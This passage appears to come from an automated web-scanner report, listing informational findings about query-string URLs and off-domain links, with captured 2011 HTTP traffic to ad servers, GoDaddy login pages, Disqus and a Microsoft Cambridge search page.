http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at%26hl%3Den%26client%3Dca-pub-9606044588835202%26adU%3Dwww.martiniwarehouse.com/WineGlass%26adT%3DHand%2BPainted%2BWine%2BGlasses%26adU%3DDesignerApparel.com/MotherBride%26adT%3D2011%2BMother%2Bof%2Bthe%2BBride%26adU%3DAfricanMango1234.com/Sale%26adT%3DBuy%2BAfrican%2BMango%2BToday%26gl%3DUS&usg=AFQjCNHZABBtrCOeTIPBSFW7fSAfiTQYjA

Request

GET /pagead/ads?client=ca-pub-9606044588835202&output=html&h=250&slotname=3304066092&w=250&lmt=1315073748&flash=10.3.183&url=http%3A%2F%2Ffrankgruber.me%2Fpost%2F9680693152%2Fthe-view-looking-out-from-techcocktail-boston-at&dt=1315055747796&bpp=34&shv=r20110824&jsv=r20110719&correlator=1315055748620&frm=4&adk=1353305767&ga_vid=17686447.1315055749&ga_sid=1315055749&ga_hid=1719381278&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=lucida%20sans&dfs=12&biw=1217&bih=1037&ref=http%3A%2F%2Fmicrosoftcambridge.com%2FCommunity%2FCommittedtoCambridge%2Ftabid%2F338%2FDefault.aspx&fu=0&ifi=1&dtd=1490&xpc=SI8ZGFwmoV&p=http%3A//frankgruber.me HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

17.9. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315109123&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F03%2Fghdb%2Fblind-boolean-sql-injection-database-user-admin-priv-cwe89-capec66-dork-ghdb-bhdb-example-poc-report-microcadca.htm&dt=1315091122720&bpp=3&shv=r20110824&jsv=r20110719&correlator=1315091123496&frm=4&adk=1819763764&ga_vid=1289538787.1315091124&ga_sid=1315091124&ga_hid=1816721475&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1217&bih=1021&eid=33895166&fu=0&ifi=1&dtd=795&xpc=zLRxKYqU8f&p=file%3A//

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/imgad?id=CICAgICAgLK2fhDYBRhaMghgC0GiTlsDBw
http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/09/03/ghdb/blind-boolean-sql-injection-database-user-admin-priv-cwe89-capec66-dork-ghdb-bhdb-example-poc-report-microcadca.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.amu.apus.edu%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFwjlr3YbEkUyzv0pYJtlC2OkM2LA

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315109123&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F03%2Fghdb%2Fblind-boolean-sql-injection-database-user-admin-priv-cwe89-capec66-dork-ghdb-bhdb-example-poc-report-microcadca.htm&dt=1315091122720&bpp=3&shv=r20110824&jsv=r20110719&correlator=1315091123496&frm=4&adk=1819763764&ga_vid=1289538787.1315091124&ga_sid=1315091124&ga_hid=1816721475&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1217&bih=1021&eid=33895166&fu=0&ifi=1&dtd=795&xpc=zLRxKYqU8f&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 03 Sep 2011 23:04:45 GMT
Server: cafe
Cache-Control: private
Content-Length: 4712
X-XSS-Protection: 1; mode=block

<html><head><style></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CICAgICAgLK2fhDYBRhaMghgC0GiTlsDBw">
...[SNIP]...
amu.apus.edu/lp/security-management/%253Futm_source%253Dgoogle-display%2526utm_medium%253Dbanner%2526utm_content%253D728x90SecurityMgmt%2526utm_campaign%253DDT%252520-%252520Security%252520Management"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CICAgICAgLK2fhDYBRhaMghgC0GiTlsDBw" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB7b5wjbJiTrTxHoOmjQTPpdz3ApDUs70BmL7o1xnAjbcB0PhaEAEYASC-zuUNOABQiuKY5wJgydb6hsijoBmgAZSvufIDugEJNzI4eDkwX2FzyAEE2gGSAWZpbGU6Ly8vRDovY2RuLzIwMTEvMDkvMDMvZ2hkYi9ibGluZC1ib29sZWFuLXNxbC1pbmplY3Rpb24tZGF0YWJhc2UtdXNlci1hZG1pbi1wcml2LWN3ZTg5LWNhcGVjNjYtZG9yay1naGRiLWJoZGItZXhhbXBsZS1wb2MtcmVwb3J0LW1pY3JvY2FkY2EuaHRtuAIYyAKYlccWqAMB9QMAAADEoAYE%26num%3D1%26sig%3DAOD64_0emk_idZ6E-rdfW0h4PoSMAnYWew%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://www.amu.apus.edu/lp/security-management/%253Futm_source%253Dgoogle-display%2526utm_medium%253Dbanner%2526utm_content%253D728x90SecurityMgmt%2526utm_campaign%253DDT%252520-%252520Security%252520Management" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/09/03/ghdb/blind-boolean-sql-injection-database-user-admin-priv-cwe89-capec66-dork-ghdb-bhdb-example-poc-report-microcadca.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.amu.apus.edu%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFwjlr3YbEkUyzv0pYJtlC2OkM2LA" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

17.10. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315108201&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F03%2Fghdb%2Fdork-stored-xss-reflected-cross-site-scripting-cwe79-cwe89-javascript-sql-injection-example-poc-report-microadca.html&dt=1315090219962&bpp=14&shv=r20110824&jsv=r20110719&correlator=1315090220332&frm=4&adk=1607234649&ga_vid=405076298.1315090220&ga_sid=1315090220&ga_hid=605253365&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1217&bih=1037&fu=0&ifi=1&dtd=535&xpc=PEtWXAXUvR&p=http%3A//xss.cx

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/09/03/ghdb/dork-stored-xss-reflected-cross-site-scripting-cwe79-cwe89-javascript-sql-injection-example-poc-report-microadca.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEo01a6GbFXNZK7WAlHSn5n7gp_xg

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315108201&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F03%2Fghdb%2Fdork-stored-xss-reflected-cross-site-scripting-cwe79-cwe89-javascript-sql-injection-example-poc-report-microadca.html&dt=1315090219962&bpp=14&shv=r20110824&jsv=r20110719&correlator=1315090220332&frm=4&adk=1607234649&ga_vid=405076298.1315090220&ga_sid=1315090220&ga_hid=605253365&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1217&bih=1037&fu=0&ifi=1&dtd=535&xpc=PEtWXAXUvR&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

17.11. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/login.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx

The response contains the following links to other domains:

https://email.secureserver.net/
https://imagesak.securepaynet.net/assets/spc_ffffff.gif
https://imagesak.securepaynet.net/assets/spc_transparent.gif
https://imagesak.securepaynet.net/idp/CSS/sso.css
https://imagesak.securepaynet.net/idp/css/1.css
https://imagesak.securepaynet.net/sso/gd/imgs/favicon.ico
https://img2.wsimg.com/pc_css/1/gd_20110829_https.min.css
https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js
https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1
https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
https://login.secureserver.net/index.php
https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:49:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD"; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:49:59 GMT; path=/
Set-Cookie: traffic=; domain=godaddy.com; path=/
Set-Cookie: traffic=; domain=godaddy.com; path=/
Set-Cookie: traffic=; domain=godaddy.com; path=/
Set-Cookie: traffic=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"></script>
...[SNIP]...
</title>
<link href='https://imagesak.securepaynet.net/idp/CSS/sso.css' type="text/css" rel="stylesheet" />

<link href='https://imagesak.securepaynet.net/idp/css/1.css' type="text/css" rel="stylesheet" />
</head>
...[SNIP]...
<div align="center" class="normal_text">
<link href='https://img2.wsimg.com/pc_css/1/gd_20110829_https.min.css' type="text/css" rel="stylesheet" />
<div style="display:none;">
...[SNIP]...
</div>
<link rel="shortcut icon" type="image/x-ico" href="https://imagesak.securepaynet.net/sso/gd/imgs/favicon.ico" />

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"></script>
...[SNIP]...
<strong><a href="https://login.secureserver.net/index.php">
Check My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/">
Check My Webmail</a>
...[SNIP]...
</script>
<script src="https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1" type="text/javascript"></script>
...[SNIP]...
<td width="100%">
<img src='https://imagesak.securepaynet.net/assets/spc_ffffff.gif' border="0" width="1"
height="10" alt=""/></td>
...[SNIP]...
<div><img src='https://imagesak.securepaynet.net/assets/spc_transparent.gif' border="0" alt="" height="10" width="1"/></div>
...[SNIP]...
<div><img src='https://imagesak.securepaynet.net/assets/spc_transparent.gif' border="0" alt="" height="8" width="1"/></div>
...[SNIP]...
<td width="100%">
<img src='https://imagesak.securepaynet.net/assets/spc_ffffff.gif' border="0" width="1"
height="10" alt=""/></td>
...[SNIP]...
<div class="div_cols">
<a href="https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe" target="_blank">Webmail</a>
...[SNIP]...

17.12. https://idp.godaddy.com/retrieveaccount.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/retrieveaccount.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://idp.godaddy.com/retrieveaccount.aspx?ci=50103&spkey=GDSWNET-M1PWCORPWEB109

The response contains the following links to other domains:

https://email.secureserver.net/
https://imagesak.securepaynet.net/idp/CSS/sso.css
https://imagesak.securepaynet.net/idp/css/1.css
https://imagesak.securepaynet.net/sso/gd/imgs/favicon.ico
https://imagesak.securepaynet.net/sso/img_password_ret.gif
https://img2.wsimg.com/pc_css/1/gd_20110829_https.min.css
https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js
https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1
https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
https://login.secureserver.net/index.php
https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:26:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:02 GMT; path=/
Set-Cookie: traffic=; domain=godaddy.com; path=/
Set-Cookie: traffic=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"></script>
...[SNIP]...
</title>
<link href="https://imagesak.securepaynet.net/idp/CSS/sso.css" type="text/css" rel="stylesheet" />

<link href="https://imagesak.securepaynet.net/idp/css/1.css" type="text/css" rel="stylesheet" />
</head>
...[SNIP]...
<div style="margin: 0; padding: 0; width: 1000px;; background-color: #FFFFFF";>
<link href='https://img2.wsimg.com/pc_css/1/gd_20110829_https.min.css' type="text/css" rel="stylesheet" />
<div style="display:none;">
...[SNIP]...
</div>
<link rel="shortcut icon" type="image/x-ico" href="https://imagesak.securepaynet.net/sso/gd/imgs/favicon.ico" />

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"></script>
...[SNIP]...
<strong><a href="https://login.secureserver.net/index.php">
Check My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/">
Check My Webmail</a>
...[SNIP]...
</script>
<script src="https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1" type="text/javascript"></script>
...[SNIP]...
<td valign="top" align="left">
<img src="https://imagesak.securepaynet.net/sso/img_password_ret.gif" height="131" width="132" hspace="8" vspace="8" alt="" />
</td>
...[SNIP]...
<div class="div_cols">
<a href="https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe" target="_blank">Webmail</a>
...[SNIP]...

17.13. http://mediacdn.disqus.com/1314991730/build/system/disqus.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1314991730/build/system/disqus.js

Issue detail

The page was loaded from a URL containing a query string:

http://mediacdn.disqus.com/1314991730/build/system/disqus.js?

The response contains the following links to other domains:

http://twitter.com/'+c+'
http://www.youtube.com/v/'),a.put(media.location),a.put('&hl=en_US&fs=1&

Request

GET /1314991730/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 02 Sep 2011 19:39:01 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 173409
X-Varnish: 1593836632
Cache-Control: max-age=2528860
Expires: Sun, 02 Oct 2011 19:42:54 GMT
Date: Sat, 03 Sep 2011 13:15:14 GMT
Connection: close

DISQUS.define("dtpl",function(){var b=function(){};b.prototype={container:function(){return this._container},textareaContainer:function(){return this._textareaContainer},show:function(){var a=this.con
...[SNIP]...
<span class="dsq-mention dsq-tt dsq-mention-twitter"original-title="Expand @'+c+'\'s profile" data-dsq-username="'+c+'" data-dsq-remote="twitter"><a class="twitter-account" href="http://twitter.com/'+c+'" onclick="window.open(\''+("http://twitter.com/intent/user?screen_name="+c)+"', 'Twitter Mention', 'height=420, width=550');return false;\">@"+c+"</a>
...[SNIP]...
</param> <embed src="http://www.youtube.com/v/'),a.put(media.location),a.put('&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed>
...[SNIP]...

17.14. http://microsoftcambridge.com/Search/tabid/722/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/Search/tabid/722/Default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss

The response contains the following links to other domains:

http://del.icio.us/post?url=http://www.microsoftcambridge.com&title=Search
http://digg.com/submit?phase=2&url=http://www.microsoftcambridge.com&title=Search
http://fast.fonts.com/cssapi/ff15d4d3-b8d1-4d30-9c24-ac5254ba91fc.css
http://help.live.com/help.aspx?mkt=en-us&project=tou&querytype=keyword&query=coc
http://privacy.microsoft.com/en-us/default.mspx
http://technorati.com/faves?add=http://www.microsoftcambridge.com
http://tou.live.com/help.aspx?project=tou&market=en-us
http://twitter.com/home?status=Check it out: http://www.microsoftcambridge.com
http://www.facebook.com/share.php?u=http://www.microsoftcambridge.com
http://www.newsvine.com/_wine/save?u=http://www.microsoftcambridge.com&h=Search
http://www.stumbleupon.com/submit?url=http://www.microsoftcambridge.com&title=Search
http://www.zoomerang.com/Survey/?p=WEB229A4RAFCRA

Request

GET /Search/tabid/722/Default.aspx?search=xss HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Community/CommittedtoCambridge/tabid/338/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=A3C0DAFD2501960491DB6D8BB4AF78CD; .ASPXANONYMOUS=RwXpWsygzAEkAAAANDBmYzBmNzItYTVjZi00ZjUxLTlhMWEtODkxYzlhOWM2NDQ40; X-Mapping-pfddgonl=29291CB50178807E04EE211C8DF8D85B; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15971
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:15:10 GMT

<!DOCTYPE html>
<html lang="en-US">
<head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type" /><meta content="text/javascript" http-equiv="Content-Script-Type" /><meta conten
...[SNIP]...
<link rel="alternate" type="application/rss+xml" href="/blog/site/feed/" title="Blog RSS Feed" /><link href="http://fast.fonts.com/cssapi/ff15d4d3-b8d1-4d30-9c24-ac5254ba91fc.css" rel="stylesheet" type="text/css" /><link type="text/css" rel="stylesheet" href="/css/styles.css" />
...[SNIP]...
<map name="imgmap" id="imgmap"> <area shape="rect" coords="0,0,22,24" href="http://www.facebook.com/share.php?u=http://www.microsoftcambridge.com" target="ext" alt="Facebook" /> <area shape="rect" coords="42,0,65,24" href="http://twitter.com/home?status=Check it out: http://www.microsoftcambridge.com" target="ext" alt="Twitter" /> <area shape="rect" coords="84,0,109,24" href="http://del.icio.us/post?url=http://www.microsoftcambridge.com&title=Search" target="ext" alt="Del.icio.us" /> <area shape="rect" coords="129,0,152,24" href="http://digg.com/submit?phase=2&url=http://www.microsoftcambridge.com&title=Search" target="ext" alt="Digg" /> <area shape="rect" coords="172,0,195,24" href="http://www.newsvine.com/_wine/save?u=http://www.microsoftcambridge.com&h=Search" target="ext" alt="Newsvine" /> <area shape="rect" coords="215,0,238,24" href="http://www.stumbleupon.com/submit?url=http://www.microsoftcambridge.com&title=Search" target="ext" alt="StumbleUpon" /> <area shape="rect" coords="258,0,281,24" href="http://technorati.com/faves?add=http://www.microsoftcambridge.com" target="ext" alt="Technorati" /><area shape="rect" coords="215,0,238,24" href="http://www.facebook.com/share.php?u=http://www.microsoftcambridge.com" target="ext" alt="Facebook" /> <area shape="rect" coords="258,0,281,24" href="http://twitter.com/home?status=Check it out: http://www.microsoftcambridge.com" target="ext" alt="Twitter" /> </map>
...[SNIP]...
</a> | <a href="http://www.zoomerang.com/Survey/?p=WEB229A4RAFCRA">Take our Survey</a>
...[SNIP]...
<p class="footer">©2011 Microsoft | <a target="_blank" href="http://privacy.microsoft.com/en-us/default.mspx">Privacy</a> | <a href="http://tou.live.com/help.aspx?project=tou&market=en-us" target="_blank">Terms of Use</a> | <a target="_blank" href="http://help.live.com/help.aspx?mkt=en-us&project=tou&querytype=keyword&query=coc">Code of Conduct</a>
...[SNIP]...

17.15. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom?

The response contains the following link to another domain:

http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:19 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=Mhd7ak5indMAAU0C; expires=Tue, 03-Sep-13 21:36:19 GMT; path=/; domain=.register.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4620
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1456927453/Bottom/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1351807614/Position1/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1894514501/x50/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/1787747773/x51/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/2039374325/x52/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/index/531770687/x53/default/empty.gif/4d686437616b35696e644d4141553043?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
